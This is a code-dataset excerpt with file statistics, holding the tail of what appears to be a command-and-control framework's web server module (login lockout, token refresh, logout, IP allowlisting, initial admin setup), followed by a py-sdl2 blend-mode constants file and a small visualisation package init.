return resp
except Exception as e:
print(str(sys.exc_info()[-1].tb_lineno) + " " + str(e))
logger.error("post login error:" + str(e))
else:
# user exists, but password is wrong
error = "Username or password invalid"
user.failed_login_count += 1
if user.failed_login_count >= 10 and user.active:
user.last_failed_login_timestamp = datetime.datetime.utcnow()
if user.id != 1:
user.active = False
await send_all_operations_message(message=f"Deactivating account {user.username} due to too many failed logins.\nLast connection from {ip}",
level="warning")
await app.db_objects.update(user)
except Exception as e:
if username is not None:
logger.warning("login error: " + str(e))
error = "Username or password invalid"
await send_all_operations_message(message=f"Attempt to login with unknown user: {username}, from {ip}",
level="warning", source="unknown_login" + ip)
template = env.get_template("login.html")
content = template.render(
links=await respect_pivot(links, request),
error=error,
config={},
view_utc_time=False,
** await getSchemes(request)
)
return response.html(content)
class UIRefresh(BaseEndpoint):
async def get(self, request, *args, **kwargs):
# go here if we're in the browser and our JWT expires so we can update it and continue on
payload = self.instance.auth.extract_payload(request, verify=True)
try:
user = await utils.call(
self.instance.auth.retrieve_user, request, payload=payload
)
except exceptions.MeEndpointNotSetup:
raise exceptions.RefreshTokenNotImplemented
user_id = await self.instance.auth._get_user_id(user)
refresh_token = await utils.call(
self.instance.auth.retrieve_refresh_token,
request=request,
user_id=user_id,
)
if isinstance(refresh_token, bytes):
refresh_token = refresh_token.decode("utf-8")
token = await self.instance.auth.retrieve_refresh_token_from_request(request)
if refresh_token != token:
raise exceptions.AuthenticationFailed()
access_token, output = await self.responses.get_access_token_output(
request, user, self.config, self.instance
)
redirect_to = (
request.headers["referer"] if "referer" in request.headers else "/"
)
resp = response.redirect(redirect_to)
resp.cookies[self.config.cookie_access_token_name()] = access_token
resp.cookies[self.config.cookie_access_token_name()]["httponly"] = True
return resp
@mythic.route("/settings", methods=["GET"])
@inject_user()
@scoped("auth:user")
async def settings(request, user):
template = env.get_template("settings.html")
try:
content = template.render(
links=await respect_pivot(links, request),
name=user["username"],
** await getSchemes(request),
config=user["ui_config"],
view_utc_time=user["view_utc_time"],
)
return response.html(content)
except Exception as e:
logger.error(str(e))
return json({"status": "error", "error": "Failed to find operator"})
@mythic.route("/logout")
@inject_user()
@scoped("auth:user")
async def logout(request, user):
resp = response.redirect("/login")
del resp.cookies["access_token"]
del resp.cookies["refresh_token"]
operator = await app.db_objects.get(db_model.operator_query, id=user["id"])
if operator.current_operation is not None:
await app.db_objects.create(
db_model.OperationEventLog,
operator=None,
operation=operator.current_operation,
message="{} signed out".format(operator.username),
)
# now actually invalidate tokens
await invalidate_refresh_token(user["id"])
return resp
@mythic.exception(asyncio.CancelledError)
async def handle_cancellation(request, exception):
logger.info(
"Request {} was cancelled".format(str(request))
)
return json({"status": "error", "error": "Request was cancelled"}, status=500)
@mythic.exception(NotFound)
async def handler_404(request, exception):
return json({"status": "error", "error": "Not Found"}, status=404)
@mythic.exception(MethodNotSupported)
async def handler_405(request, exception):
return json({"status": "error", "error": "Session Expired, refresh"}, status=405)
@mythic.exception(RequestTimeout)
def request_timeout(request, exception):
return json({"status": "error", "error": "request timeout"})
@mythic.exception(exceptions.AuthenticationFailed)
async def handler_auth_failed(request, exception):
if "/new" in request.path or "webhook" in request.path or "/auth" in request.path or "/refresh" in request.path:
return json({"status": "error", "error": "Authentication failed", "message": "access-denied", "code": "access-denied"}, status=401)
else:
return response.redirect("/login")
@mythic.exception(Unauthorized)
async def handler_auth_failed(request, exception):
if "/new" in request.path or "webhook" in request.path or "/auth" in request.path or "/refresh" in request.path:
return json({"status": "error", "error": "Authentication failed", "message": "Unauthorized", "code": "forbidden"}, status=403)
else:
return response.redirect("/login")
@mythic.exception(SanicException)
def catch_all(request, exception):
logger.exception(
"Caught random exception within Mythic: {}, {}".format(exception, str(request))
)
return json({"status": "error", "error": "Mythic encountered an error"}, status=500)
@mythic.middleware("request")
async def check_ips(request):
if (
request.path in ["/login", "/auth", "/"]
or "/payloads/download/" in request.path
):
ip = ip_address(request.headers["x-real-ip"] if "x-real-ip" in request.headers else request.ip)
for block in mythic.config["ALLOWED_IPS"]:
if ip in block:
return
return json({"error": "Not Found"}, status=404)
@mythic.middleware("response")
async def add_cors(request, response):
response.headers["Access-Control-Allow-Headers"] = "authorization,content-type"
@mythic.listener("before_server_start")
async def setup_initial_info(sanic, loop):
logger.info("setup_initial_info")
app.db_objects = Manager(mythic_db, loop=loop)
await mythic_db.connect_async(loop=loop)
app.db_objects.database.allow_sync = True # logging.WARNING
await initial_setup()
asyncio.create_task(app.api.rabbitmq_api.start_listening())
async def initial_setup():
# create mythic_admin
import multiprocessing
try:
max_worker_connection = int(200 / (multiprocessing.cpu_count() + 1))
app.websocket_pool = await asyncpg.create_pool(mythic.config["DB_POOL_ASYNCPG_CONNECT_STRING"],
max_size=max_worker_connection)
# redis automatically creates a pool behind the scenes
app.redis_pool = redis.Redis(host=app.redis_host, port=app.redis_port, db=3)
# clear the database on start
keys = app.redis_pool.keys("*")
for k in keys:
app.redis_pool.delete(k)
operators = await app.db_objects.count(Operator.select())
if operators > 0:
logger.info("Users already exist, aborting initial install")
return
salt = str(uuid4())
password = await crypto.hash_SHA512(salt + mythic_admin_password)
try:
admin, created = await app.db_objects.get_or_create(
Operator, username=mythic_admin_user, password=password, admin=True, active=True, salt=salt
)
except Exception as e:
print(e)
return
logger.info("Created Admin")
# create default operation
operation, created = await app.db_objects.get_or_create(
Operation,
name=default_operation_name,
admin=admin,
complete=False,
)
logger.info("Created Operation")
await app.db_objects.get_or_create(
OperatorOperation, operator=admin, operation=operation
)
admin.current_operation = operation
await app.db_objects.update(admin)
logger.info("Registered Admin with the default operation")
logger.info("Started parsing ATT&CK data...")
file = open("./app/default_files/other_info/attack.json", "r")
attack = js.load(file) # this is a lot of data and might take a hot second to load
for obj in attack["techniques"]:
await app.db_objects.create(ATTACK, **obj)
file.close()
logger.info("Created all ATT&CK entries")
file = open("./app/default_files/other_info/artifacts.json", "r")
artifacts_file = js.load(file)
for artifact in artifacts_file["artifacts"]:
await app.db_objects.get_or_create(
Artifact, name=artifact["name"], description=artifact["description"]
)
file.close()
logger.info("Created all base artifacts")
logger.info("Successfully finished initial setup")
except Exception as e:
from app.api.operation_api import send_all_operations_message
asyncio.create_task(
send_all_operations_message(
message=f"Worker failed to initialize:\n {str(e)}",
level="warning"))
# /static serves out static images and files
mythic.static("/static", "./app/static", name="shared_files")
mythic.static("/favicon.ico", "./app/static/favicon.ico", name="favicon")
mythic.static("/strict_time.png", "./app/static/strict_time.png", name="strict_time")
mythic.static(
"/grouped_output.png", "./app/static/grouped_output.png", name="grouped_output"
)
mythic.static(
"/no_cmd_output.png", "./app/static/no_cmd_output.png", name="no_cmd_output"
)
mythic.static("/add_comment.png", "./app/static/add_comment.png", name="add_comment")
# add links to the routes in this file at the bottom
links["index"] = mythic.url_for("index")
links["login"] = links["WEB_BASE"] + "/login"
links["logout"] = mythic.url_for("logout")
links["settings"] = mythic.url_for("settings")
| 41.21645 | 173 | 0.589014 | 8,237 | 0.43257 | 0 | 0 | 4,549 | 0.238893 | 16,022 | 0.841403 | 3,940 | 0.206911 |
9092b9fc5566c9c58a04dd93c04224cbbceb0b64 | 1,911 | py | Python | sdl2/blendmode.py | namelivia/py-sdl2 | c1bdf43501224d5f0a125dbce70198100ec7be82 | [
"CC0-1.0"
]
| 222 | 2017-08-19T00:51:59.000Z | 2022-02-05T19:39:33.000Z | sdl2/blendmode.py | namelivia/py-sdl2 | c1bdf43501224d5f0a125dbce70198100ec7be82 | [
"CC0-1.0"
]
| 103 | 2017-08-20T17:13:05.000Z | 2022-02-05T20:20:01.000Z | sdl2/blendmode.py | namelivia/py-sdl2 | c1bdf43501224d5f0a125dbce70198100ec7be82 | [
"CC0-1.0"
]
| 54 | 2017-08-20T17:13:00.000Z | 2022-01-14T23:51:13.000Z | from ctypes import c_int
from .dll import _bind
__all__ = [
# Enums
"SDL_BlendMode",
"SDL_BLENDMODE_NONE", "SDL_BLENDMODE_BLEND", "SDL_BLENDMODE_ADD",
"SDL_BLENDMODE_MOD", "SDL_BLENDMODE_MUL", "SDL_BLENDMODE_INVALID",
"SDL_BlendOperation",
"SDL_BLENDOPERATION_ADD", "SDL_BLENDOPERATION_SUBTRACT",
"SDL_BLENDOPERATION_REV_SUBTRACT", "SDL_BLENDOPERATION_MINIMUM",
"SDL_BLENDOPERATION_MAXIMUM",
"SDL_BlendFactor",
"SDL_BLENDFACTOR_ZERO", "SDL_BLENDFACTOR_ONE",
"SDL_BLENDFACTOR_SRC_COLOR", "SDL_BLENDFACTOR_ONE_MINUS_SRC_COLOR",
"SDL_BLENDFACTOR_SRC_ALPHA", "SDL_BLENDFACTOR_ONE_MINUS_SRC_ALPHA",
"SDL_BLENDFACTOR_DST_COLOR", "SDL_BLENDFACTOR_ONE_MINUS_DST_COLOR",
"SDL_BLENDFACTOR_DST_ALPHA", "SDL_BLENDFACTOR_ONE_MINUS_DST_ALPHA",
# Functions
"SDL_ComposeCustomBlendMode"
]
SDL_BlendMode = c_int
SDL_BLENDMODE_NONE = 0x00000000
SDL_BLENDMODE_BLEND = 0x00000001
SDL_BLENDMODE_ADD = 0x00000002
SDL_BLENDMODE_MOD = 0x00000004
SDL_BLENDMODE_MUL = 0x00000008
SDL_BLENDMODE_INVALID = 0x7FFFFFFF
SDL_BlendOperation = c_int
SDL_BLENDOPERATION_ADD = 0x1
SDL_BLENDOPERATION_SUBTRACT = 0x2
SDL_BLENDOPERATION_REV_SUBTRACT = 0x3
SDL_BLENDOPERATION_MINIMUM = 0x4
SDL_BLENDOPERATION_MAXIMUM = 0x5
SDL_BlendFactor = c_int
SDL_BLENDFACTOR_ZERO = 0x1
SDL_BLENDFACTOR_ONE = 0x2
SDL_BLENDFACTOR_SRC_COLOR = 0x3
SDL_BLENDFACTOR_ONE_MINUS_SRC_COLOR = 0x4
SDL_BLENDFACTOR_SRC_ALPHA = 0x5
SDL_BLENDFACTOR_ONE_MINUS_SRC_ALPHA = 0x6
SDL_BLENDFACTOR_DST_COLOR = 0x7
SDL_BLENDFACTOR_ONE_MINUS_DST_COLOR = 0x8
SDL_BLENDFACTOR_DST_ALPHA = 0x9
SDL_BLENDFACTOR_ONE_MINUS_DST_ALPHA = 0xA
SDL_ComposeCustomBlendMode = _bind("SDL_ComposeCustomBlendMode", [SDL_BlendFactor, SDL_BlendFactor, SDL_BlendOperation, SDL_BlendFactor, SDL_BlendFactor, SDL_BlendOperation], SDL_BlendMode, added='2.0.6')
| 31.327869 | 204 | 0.791209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 695 | 0.363684 |
9093d4d8bd3bc3c9e386b961c6079deedbc45036 | 204 | py | Python | python_code/cutils/viz/__init__.py | IBM/oct-glaucoma-vf-estimate | ea79352547f33fe05ee532ab9faad6a5e4811a76 | [
"Apache-2.0"
]
| null | null | null | python_code/cutils/viz/__init__.py | IBM/oct-glaucoma-vf-estimate | ea79352547f33fe05ee532ab9faad6a5e4811a76 | [
"Apache-2.0"
]
| null | null | null | python_code/cutils/viz/__init__.py | IBM/oct-glaucoma-vf-estimate | ea79352547f33fe05ee532ab9faad6a5e4811a76 | [
"Apache-2.0"
]
| null | null | null | from .vizutils import viz_overlaymask, display_side2side, display_side2sidev1, stack_patches, figure2image, get_heatmap, visualize_probmaps
from .vizutils import get_heatmap_multiple, figure2image_save | 68 | 140 | 0.872549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.